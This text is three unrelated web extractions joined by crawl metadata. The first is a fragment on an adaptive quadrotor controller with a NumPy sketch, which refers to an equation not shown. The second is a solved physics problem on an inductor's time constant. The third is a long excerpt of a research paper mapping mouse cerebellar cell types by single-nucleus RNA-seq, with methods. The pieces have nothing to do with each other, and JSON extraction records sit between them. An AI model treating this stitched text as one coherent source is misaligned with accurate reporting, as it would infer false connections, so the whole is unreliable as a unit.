In this experiment the controller handles a rotor blade breaking in the middle of the flight (listen for the rotor breaking!). The quadrotor is commanded to maintain an altitude of 1 meter above ground level. The rotor blade breaks in the middle of the flight, and the controller's task is to maintain the altitude despite the fault.
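To convey the dual time-scale idea, here is a minimal NumPy sketch (illustrative only: the network size, gains, and variable names are assumptions of mine, not the implementation from the paper). The outer-layer weights $$W$$ follow the MRAC law above at every control step, while the inner-layer weights $$\theta$$ are refined more slowly by SGD over a replay buffer.

```python
# Minimal sketch of DMRAC's dual time-scale weight updates.
import numpy as np

n, h = 4, 16                            # state dim, hidden-feature dim (assumed)
W = np.zeros((h, 1))                    # outer-layer weights (fast MRAC update)
theta = 0.1 * np.random.randn(n, h)     # inner-layer weights (slow SGD update)
Gamma, eta = 1.0, 1e-3                  # adaptation gain, SGD learning rate
P_B = np.ones((n, 1))                   # stands in for the P*B term of the MRAC law

def phi(x):
    # Inner-layer feature map; a single tanh layer stands in for phi_n(...).
    return np.tanh(x @ theta)           # shape (h,)

def mrac_step(x, e, dt):
    """Fast loop: Euler step of W_dot = -Gamma * phi(x) e^T P B."""
    global W
    W += -Gamma * np.outer(phi(x), e @ P_B) * dt

def sgd_step(buffer):
    """Slow loop: one SGD pass over a replay buffer of (x, nu_ad target) pairs."""
    global theta
    for x, nu_target in buffer:
        err = (phi(x) @ W)[0] - nu_target            # scalar output error
        # Gradient of 0.5*err^2 w.r.t. theta, chain rule through tanh.
        grad = np.outer(x, (1 - phi(x)**2) * W[:, 0] * err)
        theta -= eta * grad
```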
2022-09-26 09:02:59
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 1, "x-ck12": 0, "texerror": 0, "math_score": 0.6826871037483215, "perplexity": 1705.8923780194311}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334855.91/warc/CC-MAIN-20220926082131-20220926112131-00371.warc.gz"}
http://clay6.com/qa/33419/a-uniformly-would-soleacidal-ie-of-self-inductance-8-times-10-h-and-resista
# A uniformly wound solenoid (coil) of self-inductance $8 \times 10^{-4}\;\text{H}$ and resistance $4\;\Omega$ is broken into two identical coils. These coils are then connected in parallel across a battery of $10\;\text{V}$ of negligible internal resistance. The time constant for this circuit is $(a)\;4 \times 10^{-4}\;\text{s} \quad (b)\;\frac{1}{2} \times 10^{-4}\;\text{s} \quad (c)\;2 \times 10^{-4}\;\text{s} \quad (d)\;1 \times 10^{-4}\;\text{s}$

When the solenoid is cut into two parts, the self-inductance and resistance of each part become half:

$L$ for each part $= \large\frac{8 \times 10^{-4}}{2}$ $= 4 \times 10^{-4}\;\text{H}$, and $R$ for each part $= 2\;\Omega$.

When the two parts are connected in parallel, the effective inductance is $L = \large\frac{4 \times 10^{-4}}{2}$ $= 2 \times 10^{-4}\;\text{H}$ and the effective resistance is $R = \large\frac{2}{2}$ $\;\Omega = 1\;\Omega$.

The time constant is $T = \large\frac{L}{R}$ $= \large\frac{2 \times 10^{-4}}{1}$ $= 2 \times 10^{-4}\;\text{s}$.

Hence (c) is the correct answer.
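The arithmetic is easy to check mechanically; a quick script of my own (not part of the original solution):

```python
# Check of the time-constant arithmetic above.
L0, R0 = 8e-4, 4.0                        # original solenoid: H, ohms
L_half, R_half = L0 / 2, R0 / 2           # each identical half
L_par, R_par = L_half / 2, R_half / 2     # two halves in parallel
print(L_par / R_par)                      # 0.0002 s = 2e-4 s, option (c)
```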
2017-04-24 01:32:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9993267059326172, "perplexity": 2420.407904226609}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917118950.30/warc/CC-MAIN-20170423031158-00087-ip-10-145-167-34.ec2.internal.warc.gz"}
https://www.nature.com/articles/s41586-021-03220-z
Main

The cerebellar cortex is composed of the same basic circuit replicated thousands of times. Mossy fibres from many brain regions excite granule cells that in turn excite Purkinje cells (PCs), the sole outputs of the cerebellar cortex. Powerful climbing fibre synapses, which originate in the inferior olive, excite PCs and regulate synaptic plasticity. Additional circuit elements include inhibitory interneurons such as molecular layer interneurons (MLIs), Purkinje layer interneurons (PLIs), Golgi cells, excitatory unipolar brush cells (UBCs) and supportive Bergmann glia. There is a growing recognition that cerebellar circuits exhibit regional specializations, such as a higher density of UBCs or more prevalent PC feedback to granule cells in some lobules. Molecular variation across regions has also been identified, such as the parasagittal banding pattern of alternating PCs with high and low levels of Aldoc expression4. However, the extent to which cells are molecularly specialized in different regions is poorly understood.

Achieving a comprehensive survey of cell types in the cerebellum poses some unique challenges. First, a large majority of the neurons are granule cells, making it difficult to accurately sample the rarer types. Second, for many of the morphologically and physiologically defined cell types—especially the interneuron populations—existing molecular characterization is extremely limited. Recent advances in single-cell RNA sequencing (scRNA-seq) technology1,2,3 have increased the throughput of profiling to enable the systematic identification of cell types and states throughout the central nervous system5,6,7,8. Several recent studies have harnessed such techniques to examine some cell types in the developing mouse cerebellum9,10,11, but none has yet comprehensively defined mature cell types in the adult.

Identification of cerebellar cell types

We developed a pipeline for high-throughput single-nucleus RNA-seq (snRNA-seq) with high transcript capture efficiency and nuclei yield, as well as consistent performance across regions of the adult mouse and post mortem human brain12 (https://doi.org/10.17504/protocols.io.bck6iuze; Methods). To comprehensively sample cell types in the mouse cerebellum, we dissected and isolated nuclei from 16 different lobules, across both female and male replicates (Fig. 1a, Extended Data Fig. 1a, Methods). We recovered 780,553 nuclei profiles with a median transcript capture of 2,862 unique molecular identifiers (UMIs) per profile (Extended Data Fig. 1b, c), including 530,063 profiles from male donors, and 250,490 profiles from female donors, with minimal inter-individual batch effects (Extended Data Fig. 1d, e). To discover cell types, we used a previously developed clustering strategy12 (Methods) to partition 611,034 high-quality profiles into 46 clusters. We estimate that with this number of profiles, we can expect to sample even extremely rare cell types (prevalence of 0.15%) with a probability of greater than 90%, which suggests that we captured most transcriptional variation within the cerebellum (Extended Data Fig. 1f). We assigned each cluster to one of 18 known cell type identities on the basis of the expression of specific molecular markers that are known to correlate with defining morphological, histological and/or functional features (Fig. 1b, c, Supplementary Table 1).
These annotations were also corroborated by the expected layer-specific localizations of marker genes in the Allen Brain Atlas (ABA)13 (https://mouse.brain-map.org) (Fig. 1d). Several cell types contained multiple clusters defined by differentially expressed markers, which suggests further heterogeneity within those populations (Extended Data Fig. 2a–n, Supplementary Table 2).

Cell type variation across lobules

To quantify the regional specialization of cell types, we examined how our clusters distributed proportionally across each lobule. We found that eight of our nine PC clusters, as well as several granule cell clusters and one Bergmann glial cluster, showed the most significantly divergent lobule compositions (Pearson’s chi-squared test, false discovery rate (FDR) < 0.001; Methods) and exhibited greater than twofold enrichment in at least one lobule (Fig. 2a). There was high concordance in the regional composition of each of these types across replicates, which indicates consistent spatial enrichment patterns (Extended Data Fig. 3a). The nine PC clusters could be divided into two main groups on the basis of their expression of Aldoc, which defines parasagittal striping of Purkinje neurons across the cerebellum4. Seven of the nine PC clusters were Aldoc-positive, indicating greater specialization in this population compared with the Aldoc-negative PCs. Combinatorial expression of Aldoc and at least one subtype-specific marker fully identified the Purkinje clusters (Fig. 2b). These Aldoc-positive and Aldoc-negative groups showed a regional enrichment pattern that was consistent with the known paths of parasagittal stripes across individual lobules (Fig. 2c). When characterizing the spatial variation of the PC subtypes, we found some with spatial patterns that were recently identified using Slide-seq technology (Aldoc_1 and Aldoc_7, marked by Gpr176 and Tox2, respectively)14, as well as several undescribed subtypes and patterns (Fig. 2b, d, Extended Data Fig. 3b). Most of this PC diversity was concentrated in the posterior cerebellum, particularly the uvula and nodulus, consistent with these regions showing greater diversity in both function and connectivity15,16.

We also observed regional specialization in excitatory interneurons and Bergmann glia. Among the five granule cell subtypes (Fig. 2e), three displayed cohesive spatial enrichment patterns (subtypes 1, 2 and 3) (Fig. 2f, Extended Data Fig. 3c). In addition, and consistent with previous work17, the UBCs as a whole were highly enriched in the posterior lobules (Extended Data Fig. 3d). Finally, we identified a Bergmann glial subtype that expressed the marker genes Mybpc114 and Wif1 (Fig. 2g), with high enrichment in lobule VI, the uvula and nodulus (Fig. 2h, Extended Data Fig. 3e). The regional specialization of interneuron and glial populations is in contrast to the cerebral cortex, where molecular heterogeneity across regions is largely limited to projection neurons5,7.

Continuous variation within cell types

Molecularly defined cell populations can be highly discrete—such as the distinctions between chandelier and basket interneuron types in the cerebral cortex6—or they can vary more continuously, such as the cross-regional differences among principal cells of the striatum7,18 and cortex5,7. The cerebellum is known to contain several canonical cell types that exist as morphological and functional continua, such as the basket and stellate interneurons of the molecular layer19.
To examine continuous features of molecular variation in greater detail within interneuron types, we created a metric to quantify and visualize the continuity of gene expression between two cell clusters. In brief, we fit a logistic curve for differentially expressed genes along the dominant expression trajectory20, extracting the maximum slope (m) of the curve (Methods, Fig. 3a). We expect m values to be smaller for genes that are representative of more continuous expression variation (Fig. 3a).

Our cluster analysis initially identified three populations of UBCs, similar in number to the two to four discrete types suggested by previous immunohistochemistry studies21,22,23,24. However, comparing m values across 200 highly variable genes within the UBC, Golgi cell and MLI populations suggested that in UBCs, many genes showed continuous variation (Fig. 3b), including Grm1, Plcb4, Calb2 and Plcb1 (Fig. 3c, d). Cross-species, integrative analysis12 with cerebellar cells derived from two post mortem human donors (Methods) revealed evolutionary conservation of the continuum (Extended Data Fig. 4a), with graded expression of many of the same genes, including Grm1 and Grm2 (Extended Data Fig. 4b).

Functionally, UBCs have been classified on the basis of their response to mossy fibre activation. Discrete ON and OFF categories have previously been emphasized, although some properties of UBCs do not readily conform to these distinct categories21,25,26. Here we focused on whether the molecular gradients in the expression of metabotropic receptors readily translated to a continuum of functional properties. We pressure-applied glutamate and measured the spiking responses of UBCs with on-cell recordings, and then measured glutamate-evoked currents in the cell (Methods). In some cells, glutamate rapidly and transiently increased spiking and evoked a long-lasting inward current (Fig. 3e, top left). For other cells, glutamate transiently suppressed spontaneous firing and evoked an outward current (Fig. 3e, bottom left). Many UBCs, however, had more complex, mixed responses to glutamate; we refer to these as ‘biphasic’ cells. In one cell, for example, glutamate evoked a delayed increase in firing, caused by an initial outward current followed by a longer lasting inward current (Fig. 3e, middle left). A summary of the glutamate-evoked currents (Fig. 3e, right) suggests that the graded nature of the molecular properties of UBCs may lead to graded electrical response properties.

To link the functional and molecular continua more directly, we recorded from cells treated with agonists of mGluR1 (Grm1) or mGluR2 (Grm2) (Fig. 3f). Responses were graded across the UBC population, with a significant number of cells that responded to both agonists (Fig. 3f, Extended Data Fig. 5). This suggests that the biphasic response profile probably corresponds to the molecular continuum defined by snRNA-seq. Further studies are needed to determine the relationship between these diverse responses to applied agonists, and the responses of the cells to mossy fibre activation.

Two discrete MLI subtypes

MLIs are spontaneously active interneurons that inhibit PCs as well as other MLIs. MLIs are canonically subdivided into stellate cells located in the outer third of the molecular layer, and basket cells located in the inner third of the molecular layer that synapse onto PC somata and form specialized contacts known as pinceaus, which ephaptically inhibit PCs.
Many MLIs, particularly those in the middle of the molecular layer, share morphological features with both basket and stellate cells19. Thus, MLIs are thought to represent a single functional and morphological continuum. Our clustering analysis of MLIs and PLIs, by contrast, identified two discrete populations of MLIs. The first population, ‘MLI1’, uniformly expressed Lypd6, Sorcs3 and Ptprk (Figs. 1c, 4a). The second population, ‘MLI2’, was highly molecularly distinct from MLI1, and expressed numerous markers that are also found in PLIs, such as Nxph1 and Cdh22 (Fig. 4a). Single-molecule fluorescence in situ hybridization (smFISH) experiments with Sorcs3 and Nxph1 showed that the markers were entirely mutually exclusive (Fig. 4b, c). A cross-species analysis with 14,971 human MLI and PLI profiles demonstrated that the MLI1 and MLI2 distinction is evolutionarily conserved (Extended Data Fig. 4c, d). To examine the developmental specification of these two populations, we clustered 79,373 total nuclei from peri- and postnatal mice across several time points (ranging from embryonic day (E) 18 to postnatal day (P) 16). From a cluster of 5,519 GABA (γ-aminobutyric acid)-producing neuron progenitors, marked by the expression of canonical markers Tfap2b, Ascl1 and Pax227,28 (Methods, Extended Data Fig. 6a, b), we were able to distinguish developmental trajectories that corresponded to the MLI1 (Sorcs3-positive) and MLI2 (Nxph1-positive, Klhl1-negative) populations, with differentiation of the two types beginning at P4 and largely complete by P16 (Fig. 4d, e, Extended Data Fig. 6a). Although both populations originate from a single group of progenitors, trajectory analysis revealed several lineage-specific markers (Extended Data Fig. 6c–e). Among the MLI2 trajectory markers, we identified genes such as Fam135b, the expression of which persisted into adulthood, and Fos, which is only transiently differentially expressed between the MLI1 and MLI2 trajectories (Fig. 4e, Extended Data Fig. 6e, f). This high expression of several immediate early genes (Extended Data Fig. 6f) selectively in early MLI2 cells could indicate that differential activity is associated with MLI2 specification. MLI1s and MLI2s were present throughout the entire molecular layer, which indicates that the distinction between MLI1 and MLI2 does not correspond to the canonical basket and stellate distinction (Extended Data Fig. 7a). To understand the morphological, physiological and molecular characteristics of the MLI populations better, we developed a pipeline to record from individual MLIs in brain slices, image their morphologies, and then ascertain their molecular MLI1 and MLI2 identities by smFISH (Methods, Fig. 4f). Consistent with the marker analysis (Fig. 4a), MLI1s had a stellate morphology in the distal third of the molecular layer, whereas MLI1s located near the PC layer had a basket morphology, with contacts near PC initial segments (Fig. 4f, Extended Data Fig. 7b). We next examined whether MLI2s, in which we could not identify systematic molecular heterogeneity, had graded morphological properties. MLI2s in the distal third of the molecular layer also had stellate cell morphology, whereas MLI2s near the PC layer had a distinct morphology and appeared to form synapses preferentially near the PC layer (Extended Data Fig. 7b). Although further studies are needed to determine whether MLI2s form pinceaus, it is clear that both MLI1 and MLI2 showed a similar continuum in their morphological properties. 
The electrical characteristics of MLI1s and MLI2s also showed numerous distinctions. The average spontaneous firing rate was significantly higher for MLI1s than for MLI2s (Mann–Whitney test, P = 0.0015) (Fig. 4g), and the membrane resistance (Rm) of MLI1s was lower than that of MLI2s (Fig. 4g). In addition, we found that MLI2s were more excitable than MLI1s (Fig. 4h), and displayed a stronger hyperpolarization-activated current (Extended Data Fig. 8).

MLIs are known to be electrically coupled via gap junctions29, but it is not clear whether this is true for both MLI1s and MLI2s. In the cerebral cortex and some other brain regions, interneurons often electrically couple selectively to neurons of the same type, but not other types30,31. We therefore examined whether this also applies to MLI1s and MLI2s. The expression of Gjd2, the gene encoding the dominant gap junction protein in MLIs32, was found in MLI1s but not MLI2s, both in our single-nucleus data (Fig. 4i) and by smFISH (Fig. 4j, k), which suggests potential differences in electrical coupling. Notably, the two clusters of Golgi cells, another interneuron type known to be electrically coupled33,34, differentially expressed many of the same markers, including Sorcs3, Gjd2 and Nxph1 in both human and mouse (Extended Data Figs. 4e, f, 9). Action potentials in coupled MLIs produce small depolarizations known as spikelets that are thought to promote synchronous activity between MLIs29. We therefore investigated whether spikelets are present in MLI1s and absent in MLI2s. Consistent with the gene expression profile, we observed spikelets in 71% of MLI1s and not in MLI2s (Fig. 4l, m; P < 0.001, Fisher’s exact test). These findings suggest that most MLI1s are coupled to other MLI1s by gap junctions, whereas MLI2s show no electrical coupling to other MLIs.

Conclusions

In this Article, we used high-throughput, region-specific transcriptome sampling to build a comprehensive taxonomy of cell types in the mouse cerebellar cortex, and quantify spatial variation across individual regions. Our joint analyses with post mortem human samples indicated that the neuronal populations defined in mouse were generally conserved in human (Extended Data Fig. 4), consistent with a recent comparative analysis in the cerebral cortex35. We find considerably more regional specialization in PCs—especially in posterior lobules—than was previously recognized. These PC subtypes overlap with greater local abundances in UBCs and in distinct specializations in granule cells, which indicates a higher degree of regional circuit heterogeneity than previously thought. Our dataset is freely available to the neuroscience community (https://portal.nemoarchive.org/; https://singlecell.broadinstitute.org), facilitating functional characterization of these populations, many of which are entirely novel.

One of the biggest challenges facing the comprehensive cell typing of the brain is the correspondence problem36: how to integrate definitions of cell types on the basis of the many modalities of measurement used to characterize brain cells. We found success by first defining populations using systematic molecular profiling, and then relating these populations to physiological and morphological features using targeted, joint analyses of individual cells.
We were surprised that the cerebellar MLIs—one of the first sets of neurons to be characterized more than 130 years ago37—are in fact composed of two molecularly and physiologically discrete populations, each of which shows a similar morphological continuum along the depth axis of the molecular layer. As comprehensive cell typing proceeds across other brain regions, we expect the emergence of similar basic discoveries that challenge and extend our understanding of cellular specialization in the nervous system.

Methods

Animals

Nuclei suspensions for mouse (C57BL/6J, Jackson Labs) cerebellum profiles were generated from 2 female and 4 male adult mice (60 days old), 1 male E18 mouse, 1 male P0 (newborn) mouse, 1 female P4 (4 days old) mouse, 1 female P8, 2 male P12 and 2 female P16 mice. Adult mice were group-housed with a 12-h light-dark schedule and allowed to acclimate to their housing environment for two weeks after arrival. Timed pregnant mice were received and euthanized to yield E18 mice 6 days after arrival. Newborn mice were housed as individual litters for up to 16 days. All experiments were approved by and in accordance with Broad IACUC protocol number 012-09-16.

Brain preparation

At E18, P0, P4, P8, P12, P16 and P60, C57BL/6J mice were anaesthetized by administration of isoflurane in a gas chamber flowing 3% isoflurane for 1 min. Anaesthesia was confirmed by checking for a negative tail and paw pinch response. Mice were moved to a dissection tray and anaesthesia was prolonged via a nose cone flowing 3% isoflurane for the duration of the procedure. Transcardial perfusions were performed on adult, pregnant (E18), P8, P12 and P16 mice with ice-cold pH 7.4 HEPES buffer containing 110 mM NaCl, 10 mM HEPES, 25 mM glucose, 75 mM sucrose, 7.5 mM MgCl2, and 2.5 mM KCl to remove blood from the brain. P0 and P4 mice were unperfused. The brain was removed from P60, P8, P12 and P16 mice and frozen for 3 min in liquid nitrogen vapour. E18, P0 and P4 mice were sagittally bisected after similarly freezing their brains in situ. All tissue was moved to −80 °C for long-term storage. A detailed protocol is available at protocols.io (https://doi.org/10.17504/protocols.io.bcbrism6).

Generation of cerebellar nuclei profiles

Frozen adult mouse brains were securely mounted by the frontal cortex onto cryostat chucks with OCT embedding compound such that the entire posterior half including the cerebellum and brainstem were left exposed and thermally unperturbed. Dissection of each of 16 cerebellar vermal and cortical lobules was performed by hand in the cryostat using an ophthalmic microscalpel (Feather safety Razor P-715) pre-cooled to −20 °C and donning four surgical loupes. Whole E18, P0, P4, P8, P12 and P16 mouse cerebella were similarly curated by dissecting rhombomeric cerebellar rudiments from sagittal frozen brain hemispheres using a pre-cooled 1-mm disposable biopsy punch (Integra Miltex). Each excised tissue dissectate was placed into a pre-cooled 0.25 ml PCR tube using pre-cooled forceps and stored at −80 °C. Nuclei were extracted from this frozen tissue using gentle, detergent-based dissociation, according to a protocol available at protocols.io (https://doi.org/10.17504/protocols.io.bck6iuze) adapted from one provided by the McCarroll laboratory (Harvard Medical School), and loaded into the 10x Chromium V3 system. Reverse transcription and library generation were performed according to the manufacturer’s protocol.
Floating slice hybridization chain reaction on acute slices

Acute cerebellar slices containing Alexa 594-filled patched cells were fixed as described and stored in 70% ethanol at 4 °C until hybridization chain reaction (HCR). They were then subjected to a ‘floating slice HCR’ protocol in which the recorded cells could be simultaneously re-imaged in conjunction with HCR expression analysis in situ and catalogued as to their positions in the cerebellum. A detailed protocol (https://doi.org/10.17504/protocols.io.bck7iuzn) was performed using the following HCR probes and matching hairpins purchased from Molecular Instruments: glutamate metabotropic receptor 8 (Grm8) lot number PRC005, connexin 36 (Gjd2) lot number PRD854 and PRA673, cadherin 22 (Cdh22) lot number PRC011, neurexophilin 1 (Nxph1) lot number PRC675 and PRC466, leucine-rich glioma-inactivated protein 2 (Lgi2) lot number PRC012, somatostatin (Sst) lot number PRA213 and sortilin related VPS10 domain containing receptor 3 (Sorcs3) lot number PRC004. Amplification hairpins used were type B1, B2 and B3 in 488 nm, 647 nm and 546 nm respectively.

Patch fill and HCR co-imaging

After floating-slice HCR, slices were mounted between no. 1 coverslips with antifade compound (ProLong Glass, Invitrogen) and images were collected on an Andor CSU-X spinning disk confocal system coupled to a Nikon Eclipse Ti microscope equipped with an Andor iKon-M camera. The images were acquired with an oil immersion objective at 60×. The Alexa 594 patched cell backfill channel (561 nm) plus associated HCR probe/hairpin channels (488 nm and 647 nm) were projected through a 10–20-μm thick z-series so that an unambiguous determination of the association between the patch-filled cell and its HCR gene expression could be made. Images were processed using Nikon NIS Elements 4.4 and Nikon NIS AR.

Human brain and nuclei processing

Human donor tissue was supplied by the Human Brain and Spinal Fluid Resource Center at UCLA, through the NIH NeuroBioBank. This work was determined by the Office of Research Subjects Protection at the Broad Institute not to meet the definition of human subjects research (project ID NHSR-4235). Nuclei suspensions from human cerebellum were generated from two neuropathologically normal control cases—one female tissue donor, aged 35, and one male tissue donor, aged 36. These fresh frozen tissues had post mortem intervals of 12 and 13.5 h respectively, and were provided as whole cerebella cut into four coronal slabs. A sub-dissection of frozen cerebellar lobules was performed on dry ice just before 10x processing and nuclei were extracted from this frozen tissue using gentle, detergent-based dissociation, according to a protocol available at protocols.io (https://doi.org/10.17504/protocols.io.bck6iuze).

Electrophysiology experiments

Acute parasagittal slices were prepared at 240-μm thickness from wild-type mice aged P30–P50. Mice were anaesthetized with an intraperitoneal injection of ketamine (10 mg kg−1), perfused transcardially with an ice-cold solution containing (in mM): 110 choline chloride, 7 MgCl2, 2.5 KCl, 1.25 NaH2PO4, 0.5 CaCl2, 25 glucose, 11.5 sodium ascorbate, 3 sodium pyruvate, 25 NaHCO3, 0.003 (R)-CPP, equilibrated with 95% O2 and 5% CO2. Slices were cut in the same solution and were then transferred to artificial cerebrospinal fluid (ACSF) containing (in mM) 125 NaCl, 26 NaHCO3, 1.25 NaH2PO4, 2.5 KCl, 1 MgCl2, 1.5 CaCl2 and 25 glucose equilibrated with 95% O2 and 5% CO2 at approximately 34 °C for 30 min.
Slices were then kept at room temperature until recording. All UBC recordings were done at 34–36 °C with (in μM) 2 (R)-CPP, 5 NBQX, 1 strychnine, 10 SR95531 (gabazine) and 1.5 CGP in the bath to isolate metabotropic currents. Loose cell-attached recordings were made with ACSF-filled patch pipettes of 3–5 MΩ resistance. Whole-cell voltage-clamp recordings were performed while holding the cell at −70 mV with an internal containing (in mM): 140 KCl, 4 NaCl, 0.5 CaCl2, 10 HEPES, 4 MgATP, 0.3 NaGTP, 5 EGTA and 2 QX-314, pH adjusted to 7.2 with KOH. Brief puffs of glutamate (1 mM for 50 ms at 5 psi) were delivered using a Picospritzer II (General Valve Corp.) in both cell-attached and whole-cell configuration to assure consistent responses. The heat map of current traces from all cells is sorted by the score over the first principal axis after singular value decomposition (SVD) of recordings over all cells.

For whole-cell recordings with pharmacology, we used a K-methanesulfonate internal containing (in mM): 122 K-methanesulfonate, 9 NaCl, 9 HEPES, 0.036 CaCl2, 1.62 MgCl2, 4 MgATP, 0.3 GTP (Tris salt), 14 creatine phosphate (Tris salt) and 0.18 EGTA, pH 7.4. A junction potential of −8 mV was compensated for during recording. 300 nM TTX was added to the ACSF in conjunction with the synaptic blockers listed above. Three pipettes filled with ACSF containing 1 mM glutamate, 100 μM DHPG or 1 μM LY354740 were positioned within 20 μm of the recorded cell. Pressure applications of each agonist were delivered at 10 psi with durations of 40–50 ms. Agonist applications were separated by 30 s. Two to three trials were collected for each agonist.

MLI recordings were performed at approximately 32 °C with an internal solution containing (in mM) 150 K-gluconate, 3 KCl, 10 HEPES, 3 MgATP, 0.5 GTP, 5 phosphocreatine-tris2 and 5 phosphocreatine-Na2, 2 mg ml−1 biocytin and 0.1 Alexa 594 (pH adjusted to 7.2 with KOH, osmolality adjusted to 310 mOsm kg−1). Visually guided whole-cell recordings were obtained with patch pipettes of around 4 MΩ resistance pulled from borosilicate capillary glass (BF150-86-10, Sutter Instrument). Electrophysiology data were acquired using a Multiclamp 700B amplifier (Axon Instruments), digitized at 20 kHz and filtered at 4 kHz. For isolating spikelets in MLI recordings, cells were held at −65 mV in voltage clamp and the following receptor antagonists were added to the solution (in μM) to block synaptic currents: 2 (R)-CPP, 5 NBQX, 1 strychnine, 10 SR95531 (gabazine), 1.5 CGP. All drugs were purchased from Abcam and Tocris. To obtain an input-output curve, MLIs were maintained at −60 to −65 mV with a constant hyperpolarizing current, and 250 ms current steps ranging from −30 pA to +100 pA were injected in 10 pA increments. To activate the hyperpolarization-evoked current (Ih), MLIs were held at −65 mV and a 30 pA hyperpolarizing current step of 500 ms duration was injected. The amplitude of Ih was calculated as the difference between the maximal current evoked by the hyperpolarizing current step and the average steady-state current at the end (480–500 ms) of the current step. Capacitance and input resistance (Ri) were determined using a 10 pA, 50 ms hyperpolarizing current step. To prevent excessive dialysis and to ensure successful detection of mRNAs in the recorded cells, the total duration of recordings did not exceed 10 min. Acquisition and analysis of electrophysiological data were performed using custom routines written in MATLAB (Mathworks), IgorPro (Wavemetrics) or AxoGraphX.
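As a concrete reading of the Ih measurement described above, here is a minimal Python sketch (our illustration only; the original analysis used custom MATLAB/IgorPro/AxoGraphX routines, and the function and variable names here are ours). It assumes a trace aligned to the onset of the 500-ms hyperpolarizing step:

```python
import numpy as np

def ih_amplitude(trace: np.ndarray, dt_ms: float) -> float:
    """Ih amplitude as described above: difference between the maximal
    (most negative) deflection evoked by the 500-ms hyperpolarizing step
    and the mean steady-state level over the last 20 ms (480-500 ms)."""
    t = np.arange(trace.size) * dt_ms        # time axis from step onset
    peak = trace[t <= 500.0].min()           # maximal evoked deflection
    steady = trace[(t >= 480.0) & (t <= 500.0)].mean()  # steady state at step end
    return steady - peak                     # positive sag-like amplitude
```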
Data are reported as median ± interquartile range, and statistical analysis was carried out using the Mann–Whitney or Fisher’s exact test, as indicated. Statistical significance was assumed at P < 0.05. To determine the presence of spikelets, peak detection was used to generate event-triggered average waveforms with thresholds based on the mean absolute deviation (MAD) of the raw trace. Spikelet recordings were scored for the presence of spikelets blind to the molecular identity of the cells. The analysis was restricted to cells recorded in the presence of synaptic blockers.

Imaging and analysis

MLIs were filled with 100 μM Alexa-594 via patch pipette to visualize their morphology using two-photon imaging. After completion of the electrophysiological recordings the patch electrode was retracted slowly and the cell resealed. We used a custom-built two-photon laser-scanning microscope with a 40×, 0.8 numerical aperture (NA) objective (Olympus Optical) and a pulsed two-photon laser (Chameleon or MIRA 900, Coherent, 800 nm excitation). DIC images were acquired at the end of each experiment and locations of each cell within the slice were recorded. Two-photon images were further processed in ImageJ.

Tissue fixation of acute slices

After recording and imaging, cerebellar slices were transferred to a well-plate and submerged in 2–4% PFA in PBS (pH 7.4) and incubated overnight at 4 °C. Slices were then washed in PBS (3 × 5 min) and then kept in 70% ethanol in RNase-free water until HCR was performed.

Sequencing reads from mouse cerebellum experiments were demultiplexed and aligned to a mouse (mm10) pre-mRNA reference using CellRanger v3.0.2 with default settings. Digital gene expression matrices were generated with the CellRanger count function. Sequencing reads from human cerebellum experiments were demultiplexed and aligned to a human (hg19) pre-mRNA reference using the Drop-seq alignment workflow2, which was also used to generate the downstream digital gene expression matrices.

Estimation of adequate rare cell type detection

To estimate the probability of sufficiently sampling rare cell types in the cerebellum as a function of the total number of nuclei sampled, we used the approach proposed by the Satija laboratory (https://satijalab.org/howmanycells), with the assumption of at most 10 very rare cell types, each with a prevalence of 0.15%. We derived this minimum based on the observed prevalences of the two rarest cell types we identified (OPC_4, Purkinje_Aldoc_2). We set 70 cells as the threshold for sufficient sampling, and calculated the overall probability as a negative binomial (NB) density:

$$\mathrm{NB}(k; n, p)^{m}$$

in which k = 70, p = 0.0015, m = 10, and n represents the total number of cells sampled.

Cell type clustering and annotation

After generation of digital gene expression matrices as described above, we filtered out nuclei with fewer than 500 UMIs. We then performed cell type annotation iteratively through a number of rounds of dimensionality reduction, clustering, and removal of putative doublets and cells with high mitochondrial expression. For the preliminary clustering step, we performed standard preprocessing (UMI normalization, highly variable gene selection, scaling) with Seurat v2.3.4 as previously described38. We used principal component analysis (PCA) with 30 components and Louvain community detection with resolution 0.1 to identify major clusters (resulting in 34 clusters).
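Returning to the rare-cell sampling formula above, here is a minimal Python sketch (ours, not the Satija laboratory tool; scipy assumed). It uses the fact that seeing at least k cells of a type of prevalence p within n sampled cells is the negative binomial event of reaching k successes within n draws:

```python
from scipy.stats import nbinom

def prob_adequate_sampling(n_cells: int, k: int = 70, p: float = 0.0015,
                           m_types: int = 10) -> float:
    """P(every one of m rare types is seen at least k times among n cells).
    nbinom.cdf(n - k, k, p) = P(at most n - k failures before the k-th
    success) = P(at least k successes within n draws); types are treated
    as independent, as in the NB(k; n, p)^m formula above."""
    per_type = nbinom.cdf(n_cells - k, k, p)
    return per_type ** m_types

print(prob_adequate_sampling(100_000))   # probability for 100k sampled nuclei
```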
